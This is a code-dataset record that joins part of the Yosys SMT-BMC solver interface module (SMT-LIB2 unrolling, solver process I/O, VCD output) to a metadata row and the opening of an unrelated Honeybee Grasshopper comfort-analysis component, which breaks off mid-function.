if key not in modestart_options:
self.write("(set-option {} {})".format(key, val))
def timestamp(self):
secs = int(time() - self.start_time)
return "## %3d:%02d:%02d " % (secs // (60*60), (secs // 60) % 60, secs % 60)
def replace_in_stmt(self, stmt, pat, repl):
if stmt == pat:
return repl
if isinstance(stmt, list):
return [self.replace_in_stmt(s, pat, repl) for s in stmt]
return stmt
def unroll_stmt(self, stmt):
if not isinstance(stmt, list):
return stmt
stmt = [self.unroll_stmt(s) for s in stmt]
if len(stmt) >= 2 and not isinstance(stmt[0], list) and stmt[0] in self.unroll_decls:
assert stmt[1] in self.unroll_objs
key = tuple(stmt)
if key not in self.unroll_cache:
decl = deepcopy(self.unroll_decls[key[0]])
self.unroll_cache[key] = "|UNROLL#%d|" % self.unroll_idcnt
decl[1] = self.unroll_cache[key]
self.unroll_idcnt += 1
if decl[0] == "declare-fun":
if isinstance(decl[3], list) or decl[3] not in self.unroll_sorts:
self.unroll_objs.add(decl[1])
decl[2] = list()
else:
self.unroll_objs.add(decl[1])
decl = list()
elif decl[0] == "define-fun":
arg_index = 1
for arg_name, arg_sort in decl[2]:
decl[4] = self.replace_in_stmt(decl[4], arg_name, key[arg_index])
arg_index += 1
decl[2] = list()
if len(decl) > 0:
decl = self.unroll_stmt(decl)
self.write(self.unparse(decl), unroll=False)
return self.unroll_cache[key]
return stmt
def p_thread_main(self):
while True:
data = self.p.stdout.readline().decode("ascii")
if data == "": break
self.p_queue.put(data)
self.p_queue.put("")
self.p_running = False
def p_open(self):
assert self.p is None
try:
self.p = subprocess.Popen(self.popen_vargs, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
except FileNotFoundError:
print("%s SMT Solver '%s' not found in path." % (self.timestamp(), self.popen_vargs[0]), flush=True)
sys.exit(1)
running_solvers[self.p_index] = self.p
self.p_running = True
self.p_next = None
self.p_queue = Queue()
self.p_thread = Thread(target=self.p_thread_main)
self.p_thread.start()
def p_write(self, data, flush):
assert self.p is not None
self.p.stdin.write(bytes(data, "ascii"))
if flush: self.p.stdin.flush()
def p_read(self):
assert self.p is not None
if self.p_next is not None:
data = self.p_next
self.p_next = None
return data
if not self.p_running:
return ""
return self.p_queue.get()
def p_poll(self, timeout=0.1):
assert self.p is not None
assert self.p_running
if self.p_next is not None:
return False
try:
self.p_next = self.p_queue.get(True, timeout)
return False
except Empty:
return True
def p_close(self):
assert self.p is not None
self.p.stdin.close()
self.p_thread.join()
assert not self.p_running
del running_solvers[self.p_index]
self.p = None
self.p_next = None
self.p_queue = None
self.p_thread = None
def write(self, stmt, unroll=True):
if stmt.startswith(";"):
self.info(stmt)
if not self.setup_done:
self.info_stmts.append(stmt)
return
elif not self.setup_done:
self.setup()
stmt = stmt.strip()
if self.nocomments or self.unroll:
stmt = re.sub(r" *;.*", "", stmt)
if stmt == "": return
if unroll and self.unroll:
stmt = self.unroll_buffer + stmt
self.unroll_buffer = ""
s = re.sub(r"\|[^|]*\|", "", stmt)
if s.count("(") != s.count(")"):
self.unroll_buffer = stmt + " "
return
s = self.parse(stmt)
if self.debug_print:
print("-> %s" % s)
if len(s) == 3 and s[0] == "declare-sort" and s[2] == "0":
self.unroll_sorts.add(s[1])
return
elif len(s) == 4 and s[0] == "declare-fun" and s[2] == [] and s[3] in self.unroll_sorts:
self.unroll_objs.add(s[1])
return
elif len(s) >= 4 and s[0] == "declare-fun":
for arg_sort in s[2]:
if arg_sort in self.unroll_sorts:
self.unroll_decls[s[1]] = s
return
elif len(s) >= 4 and s[0] == "define-fun":
for arg_name, arg_sort in s[2]:
if arg_sort in self.unroll_sorts:
self.unroll_decls[s[1]] = s
return
stmt = self.unparse(self.unroll_stmt(s))
if stmt == "(push 1)":
self.unroll_stack.append((
deepcopy(self.unroll_sorts),
deepcopy(self.unroll_objs),
deepcopy(self.unroll_decls),
deepcopy(self.unroll_cache),
))
if stmt == "(pop 1)":
self.unroll_sorts, self.unroll_objs, self.unroll_decls, self.unroll_cache = self.unroll_stack.pop()
if self.debug_print:
print("> %s" % stmt)
if self.debug_file:
print(stmt, file=self.debug_file)
self.debug_file.flush()
if self.solver != "dummy":
if self.noincr:
if self.p is not None and not stmt.startswith("(get-"):
self.p_close()
if stmt == "(push 1)":
self.smt2cache.append(list())
elif stmt == "(pop 1)":
self.smt2cache.pop()
else:
if self.p is not None:
self.p_write(stmt + "\n", True)
self.smt2cache[-1].append(stmt)
else:
self.p_write(stmt + "\n", True)
def info(self, stmt):
if not stmt.startswith("; yosys-smt2-"):
return
fields = stmt.split()
if fields[1] == "yosys-smt2-solver-option":
self.smt2_options[fields[2]] = fields[3]
if fields[1] == "yosys-smt2-nomem":
if self.logic is None:
self.logic_ax = False
if fields[1] == "yosys-smt2-nobv":
if self.logic is None:
self.logic_bv = False
if fields[1] == "yosys-smt2-stdt":
if self.logic is None:
self.logic_dt = True
if fields[1] == "yosys-smt2-forall":
if self.logic is None:
self.logic_qf = False
self.forall = True
if fields[1] == "yosys-smt2-module":
self.curmod = fields[2]
self.modinfo[self.curmod] = SmtModInfo()
if fields[1] == "yosys-smt2-cell":
self.modinfo[self.curmod].cells[fields[3]] = fields[2]
if fields[1] == "yosys-smt2-topmod":
self.topmod = fields[2]
if fields[1] == "yosys-smt2-input":
self.modinfo[self.curmod].inputs.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-output":
self.modinfo[self.curmod].outputs.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-register":
self.modinfo[self.curmod].registers.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-memory":
self.modinfo[self.curmod].memories[fields[2]] = (int(fields[3]), int(fields[4]), int(fields[5]), int(fields[6]), fields[7] == "async")
if fields[1] == "yosys-smt2-wire":
self.modinfo[self.curmod].wires.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-clock":
for edge in fields[3:]:
if fields[2] not in self.modinfo[self.curmod].clocks:
self.modinfo[self.curmod].clocks[fields[2]] = edge
elif self.modinfo[self.curmod].clocks[fields[2]] != edge:
self.modinfo[self.curmod].clocks[fields[2]] = "event"
if fields[1] == "yosys-smt2-assert":
self.modinfo[self.curmod].asserts["%s_a %s" % (self.curmod, fields[2])] = fields[3]
if fields[1] == "yosys-smt2-cover":
self.modinfo[self.curmod].covers["%s_c %s" % (self.curmod, fields[2])] = fields[3]
if fields[1] == "yosys-smt2-maximize":
self.modinfo[self.curmod].maximize.add(fields[2])
if fields[1] == "yosys-smt2-minimize":
self.modinfo[self.curmod].minimize.add(fields[2])
if fields[1] == "yosys-smt2-anyconst":
self.modinfo[self.curmod].anyconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-anyseq":
self.modinfo[self.curmod].anyseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-allconst":
self.modinfo[self.curmod].allconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-allseq":
self.modinfo[self.curmod].allseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
def hiernets(self, top, regs_only=False):
def hiernets_worker(nets, mod, cursor):
for netname in sorted(self.modinfo[mod].wsize.keys()):
if not regs_only or netname in self.modinfo[mod].registers:
nets.append(cursor + [netname])
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
hiernets_worker(nets, celltype, cursor + [cellname])
nets = list()
hiernets_worker(nets, top, [])
return nets
def hieranyconsts(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].anyconsts.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hieranyseqs(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].anyseqs.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hierallconsts(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].allconsts.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hierallseqs(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].allseqs.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hiermems(self, top):
def hiermems_worker(mems, mod, cursor):
for memname in sorted(self.modinfo[mod].memories.keys()):
mems.append(cursor + [memname])
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
hiermems_worker(mems, celltype, cursor + [cellname])
mems = list()
hiermems_worker(mems, top, [])
return mems
def read(self):
stmt = []
count_brackets = 0
while True:
if self.solver == "dummy":
line = self.dummy_fd.readline().strip()
else:
line = self.p_read().strip()
if self.dummy_file is not None:
self.dummy_fd.write(line + "\n")
count_brackets += line.count("(")
count_brackets -= line.count(")")
stmt.append(line)
if self.debug_print:
print("< %s" % line)
if count_brackets == 0:
break
if self.solver != "dummy" and self.p.poll():
print("%s Solver terminated unexpectedly: %s" % (self.timestamp(), "".join(stmt)), flush=True)
sys.exit(1)
stmt = "".join(stmt)
if stmt.startswith("(error"):
print("%s Solver Error: %s" % (self.timestamp(), stmt), flush=True)
if self.solver != "dummy":
self.p_close()
sys.exit(1)
return stmt
def check_sat(self, expected=["sat", "unsat", "unknown", "timeout", "interrupted"]):
if self.debug_print:
print("> (check-sat)")
if self.debug_file and not self.nocomments:
print("; running check-sat..", file=self.debug_file)
self.debug_file.flush()
if self.solver != "dummy":
if self.noincr:
if self.p is not None:
self.p_close()
self.p_open()
for cache_ctx in self.smt2cache:
for cache_stmt in cache_ctx:
self.p_write(cache_stmt + "\n", False)
self.p_write("(check-sat)\n", True)
if self.timeinfo:
i = 0
s = "/-\|"
count = 0
num_bs = 0
while self.p_poll():
count += 1
if count < 25:
continue
if count % 10 == 0 or count == 25:
secs = count // 10
if secs < 60:
m = "(%d seconds)" % secs
elif secs < 60*60:
m = "(%d seconds -- %d:%02d)" % (secs, secs // 60, secs % 60)
else:
m = "(%d seconds -- %d:%02d:%02d)" % (secs, secs // (60*60), (secs // 60) % 60, secs % 60)
print("%s %s %c" % ("\b \b" * num_bs, m, s[i]), end="", file=sys.stderr)
num_bs = len(m) + 3
else:
print("\b" + s[i], end="", file=sys.stderr)
sys.stderr.flush()
i = (i + 1) % len(s)
if num_bs != 0:
print("\b \b" * num_bs, end="", file=sys.stderr)
sys.stderr.flush()
else:
count = 0
while self.p_poll(60):
count += 1
msg = None
if count == 1:
msg = "1 minute"
elif count in [5, 10, 15, 30]:
msg = "%d minutes" % count
elif count == 60:
msg = "1 hour"
elif count % 60 == 0:
msg = "%d hours" % (count // 60)
if msg is not None:
print("%s waiting for solver (%s)" % (self.timestamp(), msg), flush=True)
if self.forall:
result = self.read()
while result not in ["sat", "unsat", "unknown", "timeout", "interrupted", ""]:
print("%s %s: %s" % (self.timestamp(), self.solver, result))
result = self.read()
else:
result = self.read()
if self.debug_file:
print("(set-info :status %s)" % result, file=self.debug_file)
print("(check-sat)", file=self.debug_file)
self.debug_file.flush()
if result not in expected:
if result == "":
print("%s Unexpected EOF response from solver." % (self.timestamp()), flush=True)
else:
print("%s Unexpected response from solver: %s" % (self.timestamp(), result), flush=True)
if self.solver != "dummy":
self.p_close()
sys.exit(1)
return result
def parse(self, stmt):
def worker(stmt):
if stmt[0] == '(':
expr = []
cursor = 1
while stmt[cursor] != ')':
el, le = worker(stmt[cursor:])
expr.append(el)
cursor += le
return expr, cursor+1
if stmt[0] == '|':
expr = "|"
cursor = 1
while stmt[cursor] != '|':
expr += stmt[cursor]
cursor += 1
expr += "|"
return expr, cursor+1
if stmt[0] in [" ", "\t", "\r", "\n"]:
el, le = worker(stmt[1:])
return el, le+1
expr = ""
cursor = 0
while stmt[cursor] not in ["(", ")", "|", " ", "\t", "\r", "\n"]:
expr += stmt[cursor]
cursor += 1
return expr, cursor
return worker(stmt)[0]
def unparse(self, stmt):
if isinstance(stmt, list):
return "(" + " ".join([self.unparse(s) for s in stmt]) + ")"
return stmt
def bv2hex(self, v):
h = ""
v = self.bv2bin(v)
while len(v) > 0:
d = 0
if len(v) > 0 and v[-1] == "1": d += 1
if len(v) > 1 and v[-2] == "1": d += 2
if len(v) > 2 and v[-3] == "1": d += 4
if len(v) > 3 and v[-4] == "1": d += 8
h = hex(d)[2:] + h
if len(v) < 4: break
v = v[:-4]
return h
def bv2bin(self, v):
if type(v) is list and len(v) == 3 and v[0] == "_" and v[1].startswith("bv"):
x, n = int(v[1][2:]), int(v[2])
return "".join("1" if (x & (1 << i)) else "0" for i in range(n-1, -1, -1))
if v == "true": return "1"
if v == "false": return "0"
if v.startswith("#b"):
return v[2:]
if v.startswith("#x"):
return "".join(hex_dict.get(x) for x in v[2:])
assert False
def bv2int(self, v):
return int(self.bv2bin(v), 2)
def get(self, expr):
self.write("(get-value (%s))" % (expr))
return self.parse(self.read())[0][1]
def get_list(self, expr_list):
if len(expr_list) == 0:
return []
self.write("(get-value (%s))" % " ".join(expr_list))
return [n[1] for n in self.parse(self.read())]
def get_path(self, mod, path):
assert mod in self.modinfo
path = path.replace("\\", "/").split(".")
for i in range(len(path)-1):
first = ".".join(path[0:i+1])
second = ".".join(path[i+1:])
if first in self.modinfo[mod].cells:
nextmod = self.modinfo[mod].cells[first]
return [first] + self.get_path(nextmod, second)
return [".".join(path)]
def net_expr(self, mod, base, path):
if len(path) == 0:
return base
if len(path) == 1:
assert mod in self.modinfo
if path[0] == "":
return base
if path[0] in self.modinfo[mod].cells:
return "(|%s_h %s| %s)" % (mod, path[0], base)
if path[0] in self.modinfo[mod].wsize:
return "(|%s_n %s| %s)" % (mod, path[0], base)
if path[0] in self.modinfo[mod].memories:
return "(|%s_m %s| %s)" % (mod, path[0], base)
assert 0
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].cells
nextmod = self.modinfo[mod].cells[path[0]]
nextbase = "(|%s_h %s| %s)" % (mod, path[0], base)
return self.net_expr(nextmod, nextbase, path[1:])
def net_width(self, mod, net_path):
for i in range(len(net_path)-1):
assert mod in self.modinfo
assert net_path[i] in self.modinfo[mod].cells
mod = self.modinfo[mod].cells[net_path[i]]
assert mod in self.modinfo
assert net_path[-1] in self.modinfo[mod].wsize
return self.modinfo[mod].wsize[net_path[-1]]
def net_clock(self, mod, net_path):
for i in range(len(net_path)-1):
assert mod in self.modinfo
assert net_path[i] in self.modinfo[mod].cells
mod = self.modinfo[mod].cells[net_path[i]]
assert mod in self.modinfo
if net_path[-1] not in self.modinfo[mod].clocks:
return None
return self.modinfo[mod].clocks[net_path[-1]]
def net_exists(self, mod, net_path):
for i in range(len(net_path)-1):
if mod not in self.modinfo: return False
if net_path[i] not in self.modinfo[mod].cells: return False
mod = self.modinfo[mod].cells[net_path[i]]
if mod not in self.modinfo: return False
if net_path[-1] not in self.modinfo[mod].wsize: return False
return True
def mem_exists(self, mod, mem_path):
for i in range(len(mem_path)-1):
if mod not in self.modinfo: return False
if mem_path[i] not in self.modinfo[mod].cells: return False
mod = self.modinfo[mod].cells[mem_path[i]]
if mod not in self.modinfo: return False
if mem_path[-1] not in self.modinfo[mod].memories: return False
return True
def mem_expr(self, mod, base, path, port=None, infomode=False):
if len(path) == 1:
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].memories
if infomode:
return self.modinfo[mod].memories[path[0]]
return "(|%s_m%s %s| %s)" % (mod, "" if port is None else ":%s" % port, path[0], base)
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].cells
nextmod = self.modinfo[mod].cells[path[0]]
nextbase = "(|%s_h %s| %s)" % (mod, path[0], base)
return self.mem_expr(nextmod, nextbase, path[1:], port=port, infomode=infomode)
def mem_info(self, mod, path):
return self.mem_expr(mod, "", path, infomode=True)
def get_net(self, mod_name, net_path, state_name):
return self.get(self.net_expr(mod_name, state_name, net_path))
def get_net_list(self, mod_name, net_path_list, state_name):
return self.get_list([self.net_expr(mod_name, state_name, n) for n in net_path_list])
def get_net_hex(self, mod_name, net_path, state_name):
return self.bv2hex(self.get_net(mod_name, net_path, state_name))
def get_net_hex_list(self, mod_name, net_path_list, state_name):
return [self.bv2hex(v) for v in self.get_net_list(mod_name, net_path_list, state_name)]
def get_net_bin(self, mod_name, net_path, state_name):
return self.bv2bin(self.get_net(mod_name, net_path, state_name))
def get_net_bin_list(self, mod_name, net_path_list, state_name):
return [self.bv2bin(v) for v in self.get_net_list(mod_name, net_path_list, state_name)]
def wait(self):
if self.p is not None:
self.p.wait()
self.p_close()
class SmtOpts:
def __init__(self):
self.shortopts = "s:S:v"
self.longopts = ["unroll", "noincr", "noprogress", "timeout=", "dump-smt2=", "logic=", "dummy=", "info=", "nocomments"]
self.solver = "yices"
self.solver_opts = list()
self.debug_print = False
self.debug_file = None
self.dummy_file = None
self.unroll = False
self.noincr = False
self.timeinfo = os.name != "nt"
self.timeout = 0
self.logic = None
self.info_stmts = list()
self.nocomments = False
def handle(self, o, a):
if o == "-s":
self.solver = a
elif o == "-S":
self.solver_opts.append(a)
elif o == "--timeout":
self.timeout = int(a)
elif o == "-v":
self.debug_print = True
elif o == "--unroll":
self.unroll = True
elif o == "--noincr":
self.noincr = True
elif o == "--noprogress":
self.timeinfo = False
elif o == "--dump-smt2":
self.debug_file = open(a, "w")
elif o == "--logic":
self.logic = a
elif o == "--dummy":
self.dummy_file = a
elif o == "--info":
self.info_stmts.append(a)
elif o == "--nocomments":
self.nocomments = True
else:
return False
return True
def helpmsg(self):
return """
-s <solver>
set SMT solver: z3, yices, boolector, cvc4, mathsat, dummy
default: yices
-S <opt>
pass <opt> as command line argument to the solver
--timeout <value>
set the solver timeout to the specified value (in seconds).
--logic <smt2_logic>
use the specified SMT2 logic (e.g. QF_AUFBV)
--dummy <filename>
if solver is "dummy", read solver output from that file
otherwise: write solver output to that file
-v
enable debug output
--unroll
unroll uninterpreted functions
--noincr
don't use incremental solving, instead restart solver for
each (check-sat). This also avoids (push) and (pop).
--noprogress
disable timer display during solving
(this option is set implicitly on Windows)
--dump-smt2 <filename>
write smt2 statements to file
--info <smt2-info-stmt>
include the specified smt2 info statement in the smt2 output
--nocomments
strip all comments from the generated smt2 code
"""
class MkVcd:
def __init__(self, f):
self.f = f
self.t = -1
self.nets = dict()
self.clocks = dict()
def add_net(self, path, width):
path = tuple(path)
assert self.t == -1
key = "n%d" % len(self.nets)
self.nets[path] = (key, width)
def add_clock(self, path, edge):
path = tuple(path)
assert self.t == -1
key = "n%d" % len(self.nets)
self.nets[path] = (key, 1)
self.clocks[path] = (key, edge)
def set_net(self, path, bits):
path = tuple(path)
assert self.t >= 0
assert path in self.nets
if path not in self.clocks:
print("b%s %s" % (bits, self.nets[path][0]), file=self.f)
def escape_name(self, name):
name = re.sub(r"\[([0-9a-zA-Z_]*[a-zA-Z_][0-9a-zA-Z_]*)\]", r"<\1>", name)
if re.match("[\[\]]", name) and name[0] != "\\":
name = "\\" + name
return name
def set_time(self, t):
assert t >= self.t
if t != self.t:
if self.t == -1:
print("$version Generated by Yosys-SMTBMC $end", file=self.f)
print("$timescale 1ns $end", file=self.f)
print("$var integer 32 t smt_step $end", file=self.f)
print("$var event 1 ! smt_clock $end", file=self.f)
def vcdescape(n):
if n.startswith("$") or ":" in n:
return "\\" + n
return n
scope = []
for path in sorted(self.nets):
key, width = self.nets[path]
uipath = list(path)
if "." in uipath[-1] and not uipath[-1].startswith("$"):
uipath = uipath[0:-1] + uipath[-1].split(".")
for i in range(len(uipath)):
uipath[i] = re.sub(r"\[([^\]]*)\]", r"<\1>", uipath[i])
while uipath[:len(scope)] != scope:
print("$upscope $end", file=self.f)
scope = scope[:-1]
while uipath[:-1] != scope:
scopename = uipath[len(scope)]
print("$scope module %s $end" % vcdescape(scopename), file=self.f)
scope.append(uipath[len(scope)])
if path in self.clocks and self.clocks[path][1] == "event":
print("$var event 1 %s %s $end" % (key, vcdescape(uipath[-1])), file=self.f)
else:
print("$var wire %d %s %s $end" % (width, key, vcdescape(uipath[-1])), file=self.f)
for i in range(len(scope)):
print("$upscope $end", file=self.f)
print("$enddefinitions $end", file=self.f)
self.t = t
assert self.t >= 0
if self.t > 0:
print("#%d" % (10 * self.t - 5), file=self.f)
for path in sorted(self.clocks.keys()):
if self.clocks[path][1] == "posedge":
print("b0 %s" % self.nets[path][0], file=self.f)
elif self.clocks[path][1] == "negedge":
print("b1 %s" % self.nets[path][0], file=self.f)
print("#%d" % (10 * self.t), file=self.f)
print("1!", file=self.f)
print("b%s t" % format(self.t, "032b"), file=self.f)
for path in sorted(self.clocks.keys()):
if self.clocks[path][1] == "negedge":
print("b0 %s" % self.nets[path][0], file=self.f)
else:
print("b1 %s" % self.nets[path][0], file=self.f)
|
SymbiFlow/yosys
|
backends/smt2/smtio.py
|
Python
|
isc
| 40,983
|
[
"BLAST"
] |
1a48ed3d73e18c518266a09a58a348bef97cae2923a7a4442b1aff38ba8c9778
|
# This component runs an annual comfort assessment off of EnergyPlus results
#
# Honeybee: A Plugin for Environmental Analysis (GPL) started by Mostapha Sadeghipour Roudsari
#
# This file is part of Honeybee.
#
# Copyright (c) 2013-2015, Chris Mackey <Chris@MackeyArchitecture.com>
# Honeybee is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published
# by the Free Software Foundation; either version 3 of the License,
# or (at your option) any later version.
#
# Honeybee is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Honeybee; If not, see <http://www.gnu.org/licenses/>.
#
# @license GPL-3.0+ <http://spdx.org/licenses/GPL-3.0+>
"""
Use this component runs an annual comfort assessment off of EnergyPlus results and write all values into csv files.
The results in these files can be used for creating indoor comfort maps.
-
Provided by Honeybee 0.0.57
Args:
_comfAnalysisRecipe: A comfort analysis recipe out of one of the comfort recipe component.
=============: ...
workingDir_: An optional working directory on your system. Default is set to C:\Ladybug
fileName_: An optional file name for the result files as a string.
=============: ...
analysisPeriodOrHOY_: An analysis period from the 'Ladybug Analysis Period' component or an hour of the analysis between 1 and 8760 for which you want to conduct the analysis. If no value is connected here, the component will run for only noon on the winter solstice. A single HOY is used by default as longer analysis periods can take a very long time.
=============: ...
writeResultFile_: Set to 1 or 'True' to have the component write all results into CSV result files and set to 0 or 'False' to not have the component write these files. The default is set to 'True' as these simulations can be long and you usually want a copy of your results. You may want to set it to 'False' if you are just scrolling through key hours and want the fastest run possible. Set to 2 if you want the component to only write the results of the last two matrices (comfort results and degFromTarget).
parallel_: Set to "True" to run the component using multiple CPUs. This can dramatically decrease calculation time but can interfere with other intense computational processes that might be running on your machine. For this reason, the default is set to 'False.'
_runIt: Set boolean to "True" to run the component and generate files for an annual indoor comfort assessment.
Returns:
readMe!: ...
===============: ...
radTempMtx: A python matrix containing MRT data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component.
airTempMtx: A python matrix containing air temperature data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component.
operativeTempMtx: A python matrix containing operative temperature data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component.
adaptComfMtx: A python matrix containing adaptive comfort data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component.
degFromTargetMtx: A python matrix containing degrees from tartget temperature data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component.
===============: ...
radTempResult: A csv file address containing the radiant temperature resultsfor each point for every hour of the analysis.
airTempResult: A csv file address containing the air temperature results for each point for every hour of the analysis.
operativeTempResult: A csv file address containing the operative temperature results for each point for every hour of the analysis.
adaptComfResult: A csv file address containing the a series of 0's and 1's indicating whether a certain point is comfortable for every hour of the analysis.
degFromTargetResult: A csv file address containing the a series of numbers indicating the degrees that a certain point is from the neutral temperature for every hour of the analysis.
"""
ghenv.Component.Name = "Honeybee_Microclimate Map Analysis"
ghenv.Component.NickName = 'MicroclimateMap'
ghenv.Component.Message = 'VER 0.0.57\nAUG_30_2015'
ghenv.Component.Category = "Honeybee"
ghenv.Component.SubCategory = "09 | Energy | Energy"
#compatibleHBVersion = VER 0.0.56\nFEB_01_2015
#compatibleLBVersion = VER 0.0.59\nJUL_06_2015
try: ghenv.Component.AdditionalHelpFromDocStrings = "6"
except: pass
from System import Object
from System import Drawing
import System
import Grasshopper.Kernel as gh
from Grasshopper import DataTree
from Grasshopper.Kernel.Data import GH_Path
import Rhino as rc
import scriptcontext as sc
import math
import os
import System.Threading.Tasks as tasks
w = gh.GH_RuntimeMessageLevel.Warning
tol = sc.doc.ModelAbsoluteTolerance
outputsDictAdapt = {
0: ["readMe!", "..."],
1: ["===============", "..."],
2: ["radTempMtx", "A python matrix containing MRT data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
3: ["airTempMtx", "A python matrix containing air temperature data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
4: ["operativeTempMtx", "A python matrix containing operative temperature data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
5: ["adaptComfMtx", "A python matrix containing adaptive comfort data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
6: ["degFromTargetMtx", "A python matrix containing degrees from tartget temperature data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
7: ["===============", "..."],
8: ["radTempResult", "A csv file address containing the radiant temperature resultsfor each point for every hour of the analysis."],
9: ["airTempResult", "A csv file address containing the air temperature results for each point for every hour of the analysis."],
10: ["operativeTempResult", "A csv file address containing the operative temperature results for each point for every hour of the analysis."],
11: ["adaptComfResult", "A csv file address containing the a series of 0's and 1's indicating whether a certain point is comfortable for every hour of the analysis."],
12: ["degFromTargetResult", "A csv file address containing the a series of numbers indicating the degrees that a certain point is from the neutral temperature for every hour of the analysis."]
}
outputsDictPMV = {
0: ["readMe!", "..."],
1: ["===============", "..."],
2: ["radTempMtx", "A python matrix containing MRT data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
3: ["airTempMtx", "A python matrix containing air temperature data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
4: ["SET_Mtx", "A python matrix containing standard effective temperature (SET) data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
5: ["PMVComfMtx", "A python matrix containing PMV comfort data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
6: ["PMV_Mtx", "A python matrix containing predicted mean vote (PMV) data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
7: ["===============", "..."],
8: ["radTempResult", "A csv file address containing the radiant temperature resultsfor each point for every hour of the analysis."],
9: ["airTempResult", "A csv file address containing the air temperature results for each point for every hour of the analysis."],
10: ["SET_Result", "A csv file address containing the standard effective temperature (SET) results for each point for every hour of the analysis."],
11: ["PMVComfResult", "A csv file address containing the a series of 0's and 1's indicating whether a certain point is comfortable for every hour of the analysis."],
12: ["PMV_Result", "A csv file address containing predicted mean vote (PMV) results indicating the distance that a certain point is from the neutral temperature for every hour of the analysis."]
}
outputsDictUTCI = {
0: ["readMe!", "..."],
1: ["===============", "..."],
2: ["radTempMtx", "A python matrix containing MRT data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
3: ["airTempMtx", "A python matrix containing air temperature data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
4: ["UTCI_Mtx", "A python matrix containing universal thermal climate index (UTCI) data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
5: ["OutdoorComfMtx", "A python matrix containing outdoor (UTCI) comfort data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
6: ["DegFromNeutralMtx", "A python matrix containing the degrees from the neutral UTCI value of 20 C for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
7: ["===============", "..."],
8: ["radTempResult", "A csv file address containing the radiant temperature resultsfor each point for every hour of the analysis."],
9: ["airTempResult", "A csv file address containing the air temperature results for each point for every hour of the analysis."],
10: ["UTCI_Result", "A csv file address containing universal thermal climate index (UTCI) results for each point for every hour of the analysis."],
11: ["OutdoorComfResult", "A csv file address containing the a series of 0's and 1's indicating whether a certain point is comfortable for every hour of the analysis."],
12: ["DegFromNeutralResult", "A csv file address containing the degrees from the neutral UTCI value of 20 C indicating the distance that a certain point is from the neutral temperature for every hour of the analysis."]
}
def setDefaults(lb_defaultFolder, lb_preparation):
#Set a default fileName.
if fileName_ == None:
fileName = 'unnamed'
else: fileName = fileName_.strip()
#Check the directory or set a default.
